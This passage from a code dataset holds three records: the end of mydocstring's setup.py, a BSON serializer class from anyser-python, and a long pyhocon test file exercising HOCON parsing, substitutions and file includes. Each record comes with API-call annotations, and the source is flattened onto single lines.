      zip_safe=False)
[((31, 531), 'setuptools.setup', 'setup', ([], {'name': '"""mydocstring"""', 'version': '"""0.2.7"""', 'description': '"""A tool for extracting and converting Google-style docstrings to\n plain-text, markdown, and JSON."""', 'url': '"""http://github.com/ooreilly/mydocstring"""', 'author': '"""Ossian O\'Reilly"""', 'license': '"""MIT"""', 'packages': "['mydocstring']", 'install_requires': "['mako', 'docopt']", 'entry_points': "{'console_scripts': ['mydocstring=mydocstring.docstring:main']}", 'package_data': "{'mydocstring': ['templates/google_docstring.md']}", 'zip_safe': '(False)'}), '(name=\'mydocstring\', version=\'0.2.7\', description=\n """A tool for extracting and converting Google-style docstrings to\n plain-text, markdown, and JSON."""\n , url=\'http://github.com/ooreilly/mydocstring\', author=\n "Ossian O\'Reilly", license=\'MIT\', packages=[\'mydocstring\'],\n install_requires=[\'mako\', \'docopt\'], entry_points={\'console_scripts\': [\n \'mydocstring=mydocstring.docstring:main\']}, package_data={\'mydocstring\':\n [\'templates/google_docstring.md\']}, zip_safe=False)\n', (36, 531), False, 'from setuptools import setup\n')]
Cologler/anyser-python
anyser/impls/bson.py
52afa0a62003adcfe269f47d81863e00381d8ff9
# -*- coding: utf-8 -*- # # Copyright (c) 2020~2999 - Cologler <[email protected]> # ---------- # # ---------- import bson import struct from ..err import SerializeError from ..abc import * from ..core import register_format @register_format('bson', '.bson') class BsonSerializer(ISerializer): format_name = 'bson' def loadb(self, b: bytes, options: dict) -> Any: kwargs = {} kwargs.update(Options.pop_origin_kwargs(options)) self.check_options(options) try: return bson.loads(b, **kwargs) except Exception as e: raise SerializeError(e) def dumpb(self, obj, options: dict) -> bytes: kwargs = {} kwargs.update(Options.pop_origin_kwargs(options)) self.check_options(options) try: return bson.dumps(obj, **kwargs) except Exception as e: raise SerializeError(e)
[((522, 545), 'bson.loads', 'bson.loads', (['b'], {}), '(b, **kwargs)\n', (532, 545), False, 'import bson\n'), ((810, 835), 'bson.dumps', 'bson.dumps', (['obj'], {}), '(obj, **kwargs)\n', (820, 835), False, 'import bson\n')]
KevinMFong/pyhocon
tests/test_config_parser.py
091830001f2d44f91f0f8281fb119c87fd1f6660
# -*- encoding: utf-8 -*- import json import os import shutil import tempfile from collections import OrderedDict from datetime import timedelta from pyparsing import ParseBaseException, ParseException, ParseSyntaxException import mock import pytest from pyhocon import (ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree) from pyhocon.exceptions import (ConfigException, ConfigMissingException, ConfigWrongTypeException) try: from dateutil.relativedelta import relativedelta as period except Exception: from datetime import timedelta as period class TestConfigParser(object): def test_parse_simple_value(self): config = ConfigFactory.parse_string( """t = { c = 5 "d" = true e.y = { f: 7 g: "hey dude!" h: hey man i = \"\"\" "first line" "second" line \"\"\" } j = [1, 2, 3] u = 192.168.1.3/32 g = null } """ ) assert config.get_string('t.c') == '5' assert config.get_int('t.c') == 5 assert config.get_float('t.c') == 5.0 assert config.get('t.e.y.f') == 7 assert config.get('t.e.y.g') == 'hey dude!' assert config.get('t.e.y.h') == 'hey man' assert [v.strip() for v in config.get('t.e.y.i').split('\n')] == ['', '"first line"', '"second" line', ''] assert config.get_bool('t.d') is True assert config.get_int('t.e.y.f') == 7 assert config.get('t.j') == [1, 2, 3] assert config.get('t.u') == '192.168.1.3/32' assert config.get_int('t.g') is None assert config.get_float('t.g') is None assert config.get_string('t.g') is None assert config.get_bool('t.g') is None assert config.get_list('t.g') is None assert config.get_config('t.g') is None @pytest.mark.parametrize('forbidden_char', ['+', '`', '^', '?', '!', '@', '*', '&']) def test_fail_parse_forbidden_characters(self, forbidden_char): with pytest.raises(ParseBaseException): ConfigFactory.parse_string('a: hey man{}'.format(forbidden_char)) @pytest.mark.parametrize('forbidden_char', ['$', '"']) def test_fail_parse_forbidden_characters_in_context(self, forbidden_char): with pytest.raises(ParseException): ConfigFactory.parse_string('a: hey man{}'.format(forbidden_char)) @pytest.mark.parametrize('forbidden_char', ['+', '`', '^', '?', '!', '@', '*', '&']) def test_parse_forbidden_characters_quoted(self, forbidden_char): value = "hey man{}".format(forbidden_char) config = ConfigFactory.parse_string('a: "{}"'.format(value)) assert config.get_string("a") == value def test_parse_with_enclosing_brace(self): config = ConfigFactory.parse_string( """ { a: { b: 5 } } """ ) assert config.get_string('a.b') == '5' @pytest.mark.parametrize('data_set', [ ('a: 1 minutes', period(minutes=1)), ('a: 1minutes', period(minutes=1)), ('a: 2 minute', period(minutes=2)), ('a: 3 m', period(minutes=3)), ('a: 3m', period(minutes=3)), ('a: 3 min', '3 min'), ('a: 4 seconds', period(seconds=4)), ('a: 5 second', period(seconds=5)), ('a: 6 s', period(seconds=6)), ('a: 6 sec', '6 sec'), ('a: 7 hours', period(hours=7)), ('a: 8 hour', period(hours=8)), ('a: 9 h', period(hours=9)), ('a: 10 weeks', period(weeks=10)), ('a: 11 week', period(weeks=11)), ('a: 12 w', period(weeks=12)), ('a: 10 days', period(days=10)), ('a: 11 day', period(days=11)), ('a: 12 d', period(days=12)), ('a: 110 microseconds', period(microseconds=110)), ('a: 111 microsecond', period(microseconds=111)), ('a: 112 micros', period(microseconds=112)), ('a: 113 micro', period(microseconds=113)), ('a: 114 us', period(microseconds=114)), ('a: 110 milliseconds', timedelta(milliseconds=110)), ('a: 111 millisecond', timedelta(milliseconds=111)), ('a: 112 millis', timedelta(milliseconds=112)), ('a: 113 milli', 
timedelta(milliseconds=113)), ('a: 114 ms', timedelta(milliseconds=114)), ('a: 110 nanoseconds', period(microseconds=0)), ('a: 11000 nanoseconds', period(microseconds=11)), ('a: 1110000 nanosecond', period(microseconds=1110)), ('a: 1120000 nanos', period(microseconds=1120)), ('a: 1130000 nano', period(microseconds=1130)), ('a: 1140000 ns', period(microseconds=1140)), ]) def test_parse_string_with_duration(self, data_set): config = ConfigFactory.parse_string(data_set[0]) assert config['a'] == data_set[1] def test_parse_string_with_duration_with_long_unit_name(self): config = ConfigFactory.parse_string( """ a: foo b: 10 weeks c: bar """ ) assert config['b'] == period(weeks=10) def test_parse_with_list_mixed_types_with_durations_and_trailing_comma(self): config = ConfigFactory.parse_string( """ a: foo b: [a, 1, 10 weeks, 5 minutes,] c: bar """ ) assert config['b'] == ['a', 1, period(weeks=10), period(minutes=5)] def test_parse_with_enclosing_square_bracket(self): config = ConfigFactory.parse_string("[1, 2, 3]") assert config == [1, 2, 3] def test_quoted_key_with_dots(self): config = ConfigFactory.parse_string( """ "a.b.c.d": 3 t { "d": { "c": 5 } } k { "b.f.d": 7 } """ ) assert config['"a.b.c.d"'] == 3 assert config['t.d.c'] == 5 assert config['k."b.f.d"'] == 7 def test_dotted_notation_merge(self): config = ConfigFactory.parse_string( """ a { b = foo c = bar } a.c = ${a.b}" "${a.b} a.d = baz """ ) assert config['a.b'] == "foo" assert config['a.c'] == "foo foo" assert config['a.d'] == "baz" def test_comma_to_separate_expr(self): config = ConfigFactory.parse_string( """ a=1, b="abc", c=the man, d=woof, a-b-c-d=test, a b c d=test2, "a b c d e"=test3 """ ) assert config.get('a') == 1 assert config.get('b') == 'abc' assert config.get('c') == 'the man' assert config.get('d') == 'woof' assert config.get('a-b-c-d') == 'test' assert config.get('a b c d') == 'test2' assert config.get('a b c d e') == 'test3' def test_dict_merge(self): config = ConfigFactory.parse_string( """ a { d { g.h.j.u: 5 g { h.d: 4 } g.h.k: f d } h.i.m = 7 h.i { d: 5 } h.i { e:65 } } """) expected_result = { "a": { "d": { "g": { "h": { "j": { "u": 5 }, "d": 4, "k": "f d" } } }, "h": { "i": { "m": 7, "d": 5, "e": 65 } } } } assert expected_result == config def test_parse_with_comments(self): config = ConfigFactory.parse_string( """ // comment 1 # comment 2 { c = test // comment 0 g = 6 test # comment 0 # comment 3 a: { # comment 4 b: test, # comment 5 } # comment 6 t = [1, # comment 7 2, # comment 8 3, # comment 9 ] } # comment 10 // comment 11 // comment 12 """ ) assert config.get('c') == 'test' assert config.get('g') == '6 test' assert config.get('a.b') == 'test' assert config.get_string('a.b') == 'test' assert config.get('t') == [1, 2, 3] def test_missing_config(self): config = ConfigFactory.parse_string( """ a = 5 """ ) # b is not set so show raise an exception with pytest.raises(ConfigMissingException): config.get('b') def test_parse_null(self): config = ConfigFactory.parse_string( """ a = null b = [null] """ ) assert config.get('a') is None assert config.get('b')[0] is None def test_parse_override(self): config = ConfigFactory.parse_string( """ { a: { b: { c = 5 } } a.b { c = 7 d = 8 } } """ ) assert config.get('a.b.c') == 7 assert config.get('a.b.d') == 8 def test_concat_dict(self): config = ConfigFactory.parse_string( """ a: {b: 1} a: {c: 2} b: {c: 3} {d: 4} { c: 5 } """ ) assert config.get('a.b') == 1 assert config.get('a.c') == 2 assert config.get('b.c') == 5 assert config.get('b.d') == 4 def test_concat_string(self): 
config = ConfigFactory.parse_string( """ a = a b c b = 5 b c = b 7 """ ) assert config.get('a') == 'a b c' assert config.get('b') == '5 b' assert config.get('c') == 'b 7' def test_concat_list(self): config = ConfigFactory.parse_string( """ a = [1, 2] [3, 4] [ 5, 6 ] """ ) assert config.get('a') == [1, 2, 3, 4, 5, 6] assert config.get_list('a') == [1, 2, 3, 4, 5, 6] def test_bad_concat(self): ConfigFactory.parse_string('a = 45\n') with pytest.raises(ConfigWrongTypeException): ConfigFactory.parse_string('a = [4] "4"') with pytest.raises(ConfigWrongTypeException): ConfigFactory.parse_string('a = "4" [5]') with pytest.raises(ConfigWrongTypeException): ConfigFactory.parse_string('a = {b: 5} "4"') def test_string_substitutions(self): config1 = ConfigFactory.parse_string( """ { a: { b: { c = str e = "str " } } d = ${a.b.c} f = ${a.b.e} } """ ) assert config1.get('a.b.c') == 'str' assert config1.get('d') == 'str' assert config1.get('f') == 'str ' config2 = ConfigFactory.parse_string( """ { a: { b: { c = str e = "str " } } d = test ${a.b.c} f = test ${a.b.e} } """ ) assert config2.get('a.b.c') == 'str' assert config2.get('d') == 'test str' assert config2.get('f') == 'test str ' config3 = ConfigFactory.parse_string( u""" { a: { b: { c = str e = "str " } } d = test ${a.b.c} me f = test ${a.b.e} me } """ ) assert config3.get('a.b.c') == 'str' assert config3.get('d') == 'test str me' assert config3.get('f') == 'test str me' def test_string_substitutions_with_no_space(self): config = ConfigFactory.parse_string( """ app.heap_size = 128 app.java_opts = [ -Xms${app.heap_size}m -Xmx${app.heap_size}m ] """ ) assert config.get('app.java_opts') == [ '-Xms128m', '-Xmx128m' ] def test_int_substitutions(self): config1 = ConfigFactory.parse_string( """ { a: { b: { c = 5 } } d = ${a.b.c} } """ ) assert config1.get('a.b.c') == 5 assert config1.get('d') == 5 config2 = ConfigFactory.parse_string( """ { a: { b: { c = 5 } } d = test ${a.b.c} } """ ) assert config2.get('a.b.c') == 5 assert config2.get('d') == 'test 5' config3 = ConfigFactory.parse_string( """ { a: { b: { c = 5 } } d = test ${a.b.c} me } """ ) assert config3.get('a.b.c') == 5 assert config3.get('d') == 'test 5 me' def test_cascade_string_substitutions(self): config = ConfigFactory.parse_string( """ { a: { b: { c = ${e} } } d = test ${a.b.c} me e = 7 } """ ) assert config.get('a.b.c') == 7 assert config.get('d') == 'test 7 me' def test_multiple_substitutions(self): config = ConfigFactory.parse_string( """ a = 5 b=${a}${a} c=${a} ${a} """ ) assert config == { 'a': 5, 'b': '55', 'c': '5 5' } def test_dict_substitutions(self): config = ConfigFactory.parse_string( """ data-center-generic = { cluster-size = 6 } data-center-east = ${data-center-generic} {name = "east"} """ ) assert config.get('data-center-east.cluster-size') == 6 assert config.get('data-center-east.name') == 'east' config2 = ConfigFactory.parse_string( """ data-center-generic = { cluster-size = 6 } data-center-east = {name = "east"} ${data-center-generic} """ ) assert config2.get('data-center-east.cluster-size') == 6 assert config2.get('data-center-east.name') == 'east' config3 = ConfigFactory.parse_string( """ data-center-generic = { cluster-size = 6 } data-center-east = {name = "east"} ${data-center-generic} { cluster-size = 9, opts = "-Xmx4g" } """ ) assert config3.get('data-center-east.cluster-size') == 9 assert config3.get('data-center-east.name') == 'east' assert config3.get('data-center-east.opts') == '-Xmx4g' config4 = ConfigFactory.parse_string( """ data-center-generic = { cluster-size 
= 6 } data-center-east = {name = "east"} ${data-center-generic} data-center-east-prod = ${data-center-east} {tmpDir=/tmp} """ ) assert config4.get('data-center-east.cluster-size') == 6 assert config4.get('data-center-east.name') == 'east' assert config4.get('data-center-east-prod.cluster-size') == 6 assert config4.get('data-center-east-prod.tmpDir') == '/tmp' config5 = ConfigFactory.parse_string( """ data-center-generic = { cluster-size = 6 } data-center-east = ${data-center-generic} data-center-east = { name = "east" } """ ) assert config5['data-center-east'] == { 'name': 'east', 'cluster-size': 6 } config6 = ConfigFactory.parse_string( """ data-center-generic = { cluster-size = 6 } data-center-east = { name = "east" } data-center-east = ${data-center-generic} """ ) assert config6['data-center-east'] == { 'name': 'east', 'cluster-size': 6 } def test_dos_chars_with_unquoted_string_noeol(self): config = ConfigFactory.parse_string("foo = bar") assert config['foo'] == 'bar' def test_dos_chars_with_quoted_string_noeol(self): config = ConfigFactory.parse_string('foo = "5"') assert config['foo'] == '5' def test_dos_chars_with_triple_quoted_string_noeol(self): config = ConfigFactory.parse_string('foo = """5"""') assert config['foo'] == '5' def test_dos_chars_with_int_noeol(self): config = ConfigFactory.parse_string("foo = 5") assert config['foo'] == 5 def test_dos_chars_with_float_noeol(self): config = ConfigFactory.parse_string("foo = 5.0") assert config['foo'] == 5.0 def test_list_substitutions(self): config = ConfigFactory.parse_string( """ common_modules = [php, python] host_modules = ${common_modules} [java] """ ) assert config.get('host_modules') == ['php', 'python', 'java'] config2 = ConfigFactory.parse_string( """ common_modules = [php, python] host_modules = [java] ${common_modules} """ ) assert config2.get('host_modules') == ['java', 'php', 'python'] config3 = ConfigFactory.parse_string( """ common_modules = [php, python] host_modules = [java] ${common_modules} [perl] """ ) assert config3.get('common_modules') == ['php', 'python'] assert config3.get('host_modules') == ['java', 'php', 'python', 'perl'] config4 = ConfigFactory.parse_string( """ common_modules = [php, python] host_modules = [java] ${common_modules} [perl] full_modules = ${host_modules} [c, go] """ ) assert config4.get('common_modules') == ['php', 'python'] assert config4.get('host_modules') == ['java', 'php', 'python', 'perl'] assert config4.get('full_modules') == ['java', 'php', 'python', 'perl', 'c', 'go'] def test_list_element_substitution(self): config = ConfigFactory.parse_string( """ main_language = php languages = [java, ${main_language}] """ ) assert config.get('languages') == ['java', 'php'] def test_substitution_list_with_append(self): config = ConfigFactory.parse_string( """ application.foo = 128mm application.large-jvm-opts = ["-XX:+UseParNewGC"] [-Xm16g, ${application.foo}] application.large-jvm-opts2 = [-Xm16g, ${application.foo}] ["-XX:+UseParNewGC"] """) assert config["application.large-jvm-opts"] == [ '-XX:+UseParNewGC', '-Xm16g', '128mm' ] assert config["application.large-jvm-opts2"] == [ '-Xm16g', '128mm', '-XX:+UseParNewGC', ] def test_substitution_list_with_append_substitution(self): config = ConfigFactory.parse_string( """ application.foo = 128mm application.default-jvm-opts = ["-XX:+UseParNewGC"] application.large-jvm-opts = ${application.default-jvm-opts} [-Xm16g, ${application.foo}] application.large-jvm-opts2 = [-Xm16g, ${application.foo}] ${application.default-jvm-opts} """) assert 
config["application.large-jvm-opts"] == [ '-XX:+UseParNewGC', '-Xm16g', '128mm' ] assert config["application.large-jvm-opts2"] == [ '-Xm16g', '128mm', '-XX:+UseParNewGC' ] def test_non_existent_substitution(self): with pytest.raises(ConfigSubstitutionException): ConfigFactory.parse_string( """ common_modules = ${non_existent} """ ) with pytest.raises(ConfigSubstitutionException): ConfigFactory.parse_string( """ common_modules = abc ${non_existent} """ ) with pytest.raises(ConfigSubstitutionException): ConfigFactory.parse_string( """ common_modules = ${non_existent} abc """ ) with pytest.raises(ConfigSubstitutionException): ConfigFactory.parse_string( """ common_modules = abc ${non_existent} def """ ) def test_non_compatible_substitution(self): with pytest.raises(ConfigWrongTypeException): ConfigFactory.parse_string( """ common_modules = [perl] host_modules = 55 ${common_modules} """ ) with pytest.raises(ConfigWrongTypeException): ConfigFactory.parse_string( """ common_modules = [perl] host_modules = ${common_modules} 55 """ ) with pytest.raises(ConfigWrongTypeException): ConfigFactory.parse_string( """ common_modules = [perl] host_modules = aa ${common_modules} bb """ ) with pytest.raises(ConfigWrongTypeException): ConfigFactory.parse_string( """ common_modules = [perl] host_modules = aa ${common_modules} """ ) with pytest.raises(ConfigWrongTypeException): ConfigFactory.parse_string( """ common_modules = [perl] host_modules = ${common_modules} aa """ ) with pytest.raises(ConfigWrongTypeException): ConfigFactory.parse_string( """ common_modules = [perl] host_modules = aa ${common_modules} bb """ ) def test_self_ref_substitution_array(self): config = ConfigFactory.parse_string( """ x = [1,2] x = ${x} [3,4] x = [-1, 0] ${x} [5, 6] x = [-3, -2] ${x} """ ) assert config.get("x") == [-3, -2, -1, 0, 1, 2, 3, 4, 5, 6] def test_self_append_array(self): config = ConfigFactory.parse_string( """ x = [1,2] x += [3,4] """ ) assert config.get("x") == [1, 2, 3, 4] def test_self_append_string(self): ''' Should be equivalent to x = abc x = ${?x} def ''' config = ConfigFactory.parse_string( """ x = abc x += def """ ) assert config.get("x") == "abc def" def test_self_append_non_existent_string(self): ''' Should be equivalent to x = ${?x} def ''' config = ConfigFactory.parse_string( """ x += def """ ) assert config.get("x") == " def" def test_self_append_nonexistent_array(self): config = ConfigFactory.parse_string( """ x += [1,2] """ ) assert config.get("x") == [1, 2] def test_self_append_object(self): config = ConfigFactory.parse_string( """ x = {a: 1} x += {b: 2} """ ) assert config.get("x") == {'a': 1, 'b': 2} def test_self_append_nonexistent_object(self): config = ConfigFactory.parse_string( """ x += {a: 1} """ ) assert config.get("x") == {'a': 1} def test_self_ref_substitution_array_to_dict(self): config = ConfigFactory.parse_string( """ x = [1,2] x = {x: [3,4]} x = {y: [5,6]} x = {z: ${x}} """ ) assert config.get("x.x") == [3, 4] assert config.get("x.y") == [5, 6] assert config.get("x.z") == {'x': [3, 4], 'y': [5, 6]} def test_self_ref_substitiotion_dict_in_array(self): config = ConfigFactory.parse_string( """ x = {x: [3,4]} x = [${x}, 2, 3] """ ) (one, two, three) = config.get("x") assert one == {'x': [3, 4]} assert two == 2 assert three == 3 def test_self_ref_substitution_dict_path(self): config = ConfigFactory.parse_string( """ x = {y: {z: 1}} x = ${x.y} """ ) assert config.get("x.y") == {'z': 1} assert config.get("x.z") == 1 assert set(config.get("x").keys()) == set(['y', 'z']) def 
test_self_ref_substitution_dict_path_hide(self): config = ConfigFactory.parse_string( """ x = {y: {y: 1}} x = ${x.y} """ ) assert config.get("x.y") == 1 assert set(config.get("x").keys()) == set(['y']) def test_self_ref_substitution_dict_recurse(self): with pytest.raises(ConfigSubstitutionException): ConfigFactory.parse_string( """ x = ${x} """ ) def test_self_ref_substitution_dict_recurse2(self): with pytest.raises(ConfigSubstitutionException): ConfigFactory.parse_string( """ x = ${x} x = ${x} """ ) def test_self_ref_substitution_dict_merge(self): ''' Example from HOCON spec ''' config = ConfigFactory.parse_string( """ foo : { a : { c : 1 } } foo : ${foo.a} foo : { a : 2 } """ ) assert config.get('foo') == {'a': 2, 'c': 1} assert set(config.keys()) == set(['foo']) def test_self_ref_substitution_dict_otherfield(self): ''' Example from HOCON spec ''' config = ConfigFactory.parse_string( """ bar : { foo : 42, baz : ${bar.foo} } """ ) assert config.get("bar") == {'foo': 42, 'baz': 42} assert set(config.keys()) == set(['bar']) def test_self_ref_substitution_dict_otherfield_merged_in(self): ''' Example from HOCON spec ''' config = ConfigFactory.parse_string( """ bar : { foo : 42, baz : ${bar.foo} } bar : { foo : 43 } """ ) assert config.get("bar") == {'foo': 43, 'baz': 43} assert set(config.keys()) == set(['bar']) def test_self_ref_substitution_dict_otherfield_merged_in_mutual(self): ''' Example from HOCON spec ''' config = ConfigFactory.parse_string( """ // bar.a should end up as 4 bar : { a : ${foo.d}, b : 1 } bar.b = 3 // foo.c should end up as 3 foo : { c : ${bar.b}, d : 2 } foo.d = 4 """ ) assert config.get("bar") == {'a': 4, 'b': 3} assert config.get("foo") == {'c': 3, 'd': 4} assert set(config.keys()) == set(['bar', 'foo']) def test_self_ref_substitution_string_opt_concat(self): ''' Example from HOCON spec ''' config = ConfigFactory.parse_string( """ a = ${?a}foo """ ) assert config.get("a") == 'foo' assert set(config.keys()) == set(['a']) def test_self_ref_substitution_dict_recurse_part(self): with pytest.raises(ConfigSubstitutionException): ConfigFactory.parse_string( """ x = ${x} {y: 1} x = ${x.y} """ ) def test_self_ref_substitution_object(self): config = ConfigFactory.parse_string( """ x = {a: 1, b: 2} x = ${x} {c: 3} x = {z: 0} ${x} x = {y: -1} ${x} {d: 4} """ ) assert config.get("x") == {'a': 1, 'b': 2, 'c': 3, 'z': 0, 'y': -1, 'd': 4} def test_self_ref_child(self): config = ConfigFactory.parse_string( """ a.b = 3 a.b = ${a.b} a.b = ${a.b} a.c = [1,2] a.c = ${a.c} a.d = {foo: bar} a.d = ${a.d} """ ) assert config.get("a") == {'b': 3, 'c': [1, 2], 'd': {'foo': 'bar'}} def test_concat_multi_line_string(self): config = ConfigFactory.parse_string( """ common_modules = perl \ java \ python """ ) assert [x.strip() for x in config['common_modules'].split() if x.strip(' ') != ''] == ['perl', 'java', 'python'] def test_concat_multi_line_list(self): config = ConfigFactory.parse_string( """ common_modules = [perl] \ [java] \ [python] """ ) assert config['common_modules'] == ['perl', 'java', 'python'] def test_concat_multi_line_dict(self): config = ConfigFactory.parse_string( """ common_modules = {a:perl} \ {b:java} \ {c:python} """ ) assert config['common_modules'] == {'a': 'perl', 'b': 'java', 'c': 'python'} def test_parse_URL_from_samples(self): config = ConfigFactory.parse_URL("file:samples/aws.conf") assert config.get('data-center-generic.cluster-size') == 6 assert config.get('large-jvm-opts') == ['-XX:+UseParNewGC', '-Xm16g'] def test_parse_URL_from_invalid(self): config = 
ConfigFactory.parse_URL("https://nosuchurl") assert config == [] def test_include_dict_from_samples(self): config = ConfigFactory.parse_file("samples/animals.conf") assert config.get('cat.garfield.say') == 'meow' assert config.get('dog.mutt.hates.garfield.say') == 'meow' def test_include_glob_dict_from_samples(self): config = ConfigFactory.parse_file("samples/all_animals.conf") assert config.get('animals.garfield.say') == 'meow' assert config.get('animals.mutt.hates.garfield.say') == 'meow' def test_include_glob_list_from_samples(self): config = ConfigFactory.parse_file("samples/all_bars.conf") bars = config.get_list('bars') assert len(bars) == 10 names = {bar['name'] for bar in bars} types = {bar['type'] for bar in bars if 'type' in bar} print(types, '(((((') assert 'Bloody Mary' in names assert 'Homer\'s favorite coffee' in names assert 'milk' in types def test_list_of_dicts(self): config = ConfigFactory.parse_string( """ a: [ {a: 1, b: 2}, {a: 3, c: 4}, ] """ ) assert config['a'] == [ {'a': 1, 'b': 2}, {'a': 3, 'c': 4} ] def test_list_of_lists(self): config = ConfigFactory.parse_string( """ a: [ [1, 2] [3, 4] ] """ ) assert config['a'] == [ [1, 2], [3, 4] ] def test_list_of_dicts_with_merge(self): config = ConfigFactory.parse_string( """ b = {f: 4} a: [ ${b} {a: 1, b: 2}, {a: 3, c: 4} ${b}, {a: 3} ${b} {c: 6}, ] """ ) assert config['a'] == [ {'a': 1, 'b': 2, 'f': 4}, {'a': 3, 'c': 4, 'f': 4}, {'a': 3, 'c': 6, 'f': 4} ] def test_list_of_lists_with_merge(self): config = ConfigFactory.parse_string( """ b = [5, 6] a: [ ${b} [1, 2] [3, 4] ${b} [1, 2] ${b} [7, 8] ] """ ) assert config['a'] == [ [5, 6, 1, 2], [3, 4, 5, 6], [1, 2, 5, 6, 7, 8] ] def test_invalid_assignment(self): with pytest.raises(ParseSyntaxException): ConfigFactory.parse_string('common_modules [perl]') with pytest.raises(ParseException): ConfigFactory.parse_string('common_modules {} {perl: 1}') with pytest.raises(ParseSyntaxException): ConfigFactory.parse_string( """ a = {f: 5} common_modules ${a} {perl: 1} """) def test_invalid_dict(self): with pytest.raises(ParseSyntaxException): ConfigFactory.parse_string( """ a = { f: 5 g } """) with pytest.raises(ParseSyntaxException): ConfigFactory.parse_string('a = {g}') def test_include_file(self): with tempfile.NamedTemporaryFile('w') as fdin: fdin.write('[1, 2]') fdin.flush() config1 = ConfigFactory.parse_string( """ a: [ include "{tmp_file}" ] """.format(tmp_file=fdin.name) ) assert config1['a'] == [1, 2] config2 = ConfigFactory.parse_string( """ a: [ include file("{tmp_file}") ] """.format(tmp_file=fdin.name) ) assert config2['a'] == [1, 2] config3 = ConfigFactory.parse_string( """ a: [ include url("file://{tmp_file}") ] """.format(tmp_file=fdin.name) ) assert config3['a'] == [1, 2] def test_include_missing_file(self): config1 = ConfigFactory.parse_string( """ a: [ include "dummy.txt" 3 4 ] """ ) assert config1['a'] == [3, 4] def test_include_required_file(self): config = ConfigFactory.parse_string( """ a { include required("samples/animals.d/cat.conf") t = 2 } """ ) expected = { 'a': { 'garfield': { 'say': 'meow' }, 't': 2 } } assert expected == config config2 = ConfigFactory.parse_string( """ a { include required(file("samples/animals.d/cat.conf")) t = 2 } """ ) assert expected == config2 def test_include_missing_required_file(self): with pytest.raises(IOError): ConfigFactory.parse_string( """ a: [ include required("dummy.txt") 3 4 ] """ ) def test_resolve_package_path(self): path = ConfigParser.resolve_package_path("pyhocon:config_parser.py") assert os.path.exists(path) def 
test_resolve_package_path_format(self): with pytest.raises(ValueError): ConfigParser.resolve_package_path("pyhocon/config_parser.py") def test_resolve_package_path_missing(self): with pytest.raises(ImportError): ConfigParser.resolve_package_path("non_existent_module:foo.py") def test_include_package_file(self, monkeypatch): temp_dir = tempfile.mkdtemp() try: module_dir = os.path.join(temp_dir, 'my_module') module_conf = os.path.join(module_dir, 'my.conf') # create the module folder and necessary files (__init__ and config) os.mkdir(module_dir) open(os.path.join(module_dir, '__init__.py'), 'a').close() with open(module_conf, 'w') as fdin: fdin.write("{c: 3}") # add the temp dir to sys.path so that 'my_module' can be discovered monkeypatch.syspath_prepend(temp_dir) # load the config and include the other config file from 'my_module' config = ConfigFactory.parse_string( """ a: 1 b: 2 include package("my_module:my.conf") """ ) # check that the contents of both config files are available assert dict(config.as_plain_ordered_dict()) == {'a': 1, 'b': 2, 'c': 3} finally: shutil.rmtree(temp_dir, ignore_errors=True) def test_include_dict(self): expected_res = { 'a': 1, 'b': 2, 'c': 3, 'd': 4 } with tempfile.NamedTemporaryFile('w') as fdin: fdin.write('{a: 1, b: 2}') fdin.flush() config1 = ConfigFactory.parse_string( """ a: {{ include "{tmp_file}" c: 3 d: 4 }} """.format(tmp_file=fdin.name) ) assert config1['a'] == expected_res config2 = ConfigFactory.parse_string( """ a: {{ c: 3 d: 4 include "{tmp_file}" }} """.format(tmp_file=fdin.name) ) assert config2['a'] == expected_res config3 = ConfigFactory.parse_string( """ a: {{ c: 3 include "{tmp_file}" d: 4 }} """.format(tmp_file=fdin.name) ) assert config3['a'] == expected_res def test_include_substitution(self): with tempfile.NamedTemporaryFile('w') as fdin: fdin.write('y = ${x}') fdin.flush() config = ConfigFactory.parse_string( """ include "{tmp_file}" x = 42 """.format(tmp_file=fdin.name) ) assert config['x'] == 42 assert config['y'] == 42 @pytest.mark.xfail def test_include_substitution2(self): with tempfile.NamedTemporaryFile('w') as fdin: fdin.write('{ x : 10, y : ${x} }') fdin.flush() config = ConfigFactory.parse_string( """ { a : { include """ + '"' + fdin.name + """" } a : { x : 42 } } """ ) assert config['a']['x'] == 42 assert config['a']['y'] == 42 def test_var_with_include_keyword(self): config = ConfigFactory.parse_string( """ include-database=true """) assert config == { 'include-database': True } def test_substitution_override(self): config = ConfigFactory.parse_string( """ database { host = localhost port = 5432 user = people name = peopledb pass = peoplepass } user=test_user pass=test_pass database { user = ${user} pass = ${pass} } """) assert config['database.user'] == 'test_user' assert config['database.pass'] == 'test_pass' def test_substitution_flat_override(self): config = ConfigFactory.parse_string( """ database { name = peopledb pass = peoplepass name = ${?NOT_EXISTS} pass = ${?NOT_EXISTS} } """) assert config['database.name'] == 'peopledb' assert config['database.pass'] == 'peoplepass' def test_substitution_multiple_override(self): config = ConfigFactory.parse_string( """ a: 1 b: foo c: ${a} ${b} c: ${b} ${a} d: ${a} ${b} d: ${a} bar """) assert config['c'] == 'foo 1' assert config['d'] == '1 bar' def test_substitution_nested_override(self): config = ConfigFactory.parse_string( """ database { name = peopledb pass = peoplepass } database { name = ${?user} pass = ${?pass} } """) assert config['database.name'] == 'peopledb' assert 
config['database.pass'] == 'peoplepass' def test_optional_with_merge(self): unresolved = ConfigFactory.parse_string( """ foo: 42 foo: ${?a} """, resolve=False) source = ConfigFactory.parse_string( """ b: 14 """) config = unresolved.with_fallback(source) assert config['foo'] == 42 config = source.with_fallback(unresolved) assert config['foo'] == 42 def test_fallback_with_resolve(self): config3 = ConfigFactory.parse_string("c=5") config2 = ConfigFactory.parse_string("b=${c}", resolve=False) config1 = ConfigFactory.parse_string("a=${b}", resolve=False) \ .with_fallback(config2, resolve=False) \ .with_fallback(config3) assert {'a': 5, 'b': 5, 'c': 5} == config1 def test_optional_substitution(self): config = ConfigFactory.parse_string( """ a = 45 b = ${?c} d = ${?c} 4 e = ${?a} g = ${?c1} ${?c2} h = ${?c1} ${?c2} 1 """) assert 'b' not in config assert config['d'] == 4 assert config['e'] == 45 assert 'g' not in config assert config['h'] == 1 def test_cascade_optional_substitution(self): config = ConfigFactory.parse_string( """ num = 3 retries_msg = You have ${num} retries retries_msg = ${?CUSTOM_MSG} """) assert config == { 'num': 3, 'retries_msg': 'You have 3 retries' } def test_substitution_cycle(self): with pytest.raises(ConfigSubstitutionException): ConfigFactory.parse_string( """ a = ${b} b = ${c} c = ${a} """) def test_assign_number_with_eol(self): config = ConfigFactory.parse_string( """ a = 4 b = # test # test2 5 c = 6 """ ) assert config['a'] == 4 assert config['b'] == 5 assert config['c'] == 6 def test_assign_int(self): config = ConfigFactory.parse_string( """ 